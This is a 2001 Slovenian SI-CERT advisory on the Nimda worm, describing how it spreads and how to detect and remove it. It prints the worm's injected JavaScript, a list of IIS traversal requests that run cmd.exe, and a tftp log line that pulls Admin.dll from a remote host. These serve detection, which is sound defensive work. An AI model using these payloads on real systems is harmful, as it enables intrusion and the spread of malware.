Izberite jezik

SI-CERT 2001-08 / Nimda črv

30.09.2001

Prizadeti sistemi

Operacijski sistemi Microsoft Windows 95, 98, ME, NT, and 2000.

Opis

Nimda črv izrablja različne pomanjkljivosti na MS Windows sistemih za svoje širjenje. Črv lahko izvaja poljubne ukaze na okuženem sistemu in lahko povzroči tudi motenje drugih sistemov na internetu.

Črv se širi na naslednje načine:

  • preko elektronske pošte
  • preko deljenih diskov (Windows share)
  • z izrabo pomanjkljivosti v spletnem pregledovalniku
  • preko varnostnih pomanjkljivosti v strežniku Microsoft IIS verziji 4.0 in 5.0
  • preko stranskih vrat, ki jih za seboj pusti črv Code Red II 

Elektronski naslovi, kamor se črv razpošlje so nabrani iz dveh virov:

  • .htm in .html datoteke v lokalnem odložišču (web cache)
  • vsebine elektronskih sporočil, ki so nabrane preko MAPI servisa 

Okuženi sistem začne tudi pregledovati druge naključne sisteme z namenom odkrivanja varnostnih lukenj, ki mu omogočajo širjenje. Črv pregleda disk okuženega sistema in svoje kopije zapiše kot datoteke s podaljškoma .eml ali .nws (recimo readme.eml). Kadar naleti na HTML ali ASP datoteko, vanjo doda naslednjo JavaScript kodo:

<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>

kar omogoča širjenje na sisteme preko spletnega pregledovalnika.

Črv omogoči dostop do C: diska preko oznake C$, ustvari uporabniško ime "Guest" in to ime doda v skupino administratorjev. Nadalje okuži tudi programe na okuženem sistemu in jih tako spremeni v trojanske konje.

Širjenje preko elektronske pošte 

Črv se širi po elektronski pošti kot "MIME multipart/alternative" sporočilo v dveh delih. Prvi del je označen kot HTML dokument (MIME tip text/html), vendar ne vsebuje teksta, zato sporočilo izgleda prazno. Drugi del je označen kot zvočni zapis (MIME tip audio/x-wav), vsebuje pa program readme.exe.

Zaradi varnostne luknje, opisane v CERT/CC obvestilu CA-2001-06 poštni programi na procesorjih x86, ki uporabljajo Microsoft Internet Explorer 5.5 SP1 ali zgodnejšo verzijo tega (razen IE 5.01 SP2) za prikaz HTML vsebine v sporočilih, avtomatsko zaženejo vse pripone v sporočilu in tako omogočajo okužbo s pripeto datoteko, ki vsebuje Nimda črva.

Okuženi sistem skuša razposlati kopije črva drugim uporabnikom vsake 10 dni.

Širjenje preko spletnega pregledovalnika 

Ker črv doda JavaScript kodo na vse HTML in ASP datoteke, uporabniki, ki dostopajo do teh datotek s spletnimi pregledovalniki lahko kodo prenesejo na svoj sistem. Nekateri pregledovalniki prenešeno kodo lahko samodejno zaženejo in tako okužijo nov sistem.

Odkrivanje 

Pregledovanje (scanning) Nimda črva v sistemskih dnevnikih pusti zapise oblike:

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c..
    /winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 

Okužen sistem lahko vsebuje naslednje datoteke:

  • root.exe – nakazuje okužbo s Code Red II ali IIS/sadmind črvoma in posledično pomeni možnost okužbe z Nimda črvom
  • Admin.dll – datoteko najdemo v glavnem direktoriju (recimo C:, D: ali E:); datoteka z istim imenom v drugih direktorijih je del IIS strežnika in ne pomeni okužbe z Nimda črvom
  • nenavadne .eml in .nws datoteke v različnih direktorijih
  • prisoten zapis
    /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:Admin.dll 200

    v log datoteki IIS strežnika, kjer niz x.x.x.x predstavlja IP številko okuženega sistema, s katerega se je Nimda črv skopiral. Število 200 predstavlja HTTP kodo za uspešen prenos. Le če je to število prisotno je prišlo do okužbe na ta način. 

Rešitve problema

Navodila za odstranjevanje najdete na naslovu

http://www.kabi.si/si21/f-prot/nimda.html

Eden od možnih načinov odstranitve črva je tudi formatiranje diskov in ponovna inštalacija sistema iz varnega medija (recimo CD-ROM). Nato morate namestiti vse popravke sistema, ki so zbrani na naslovu:

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Priporočamo tudi namestitev protivirusnega programa, ki ima možnost nadgradnje spiskov obstoječih virusov preko interneta.

Dodatne informacije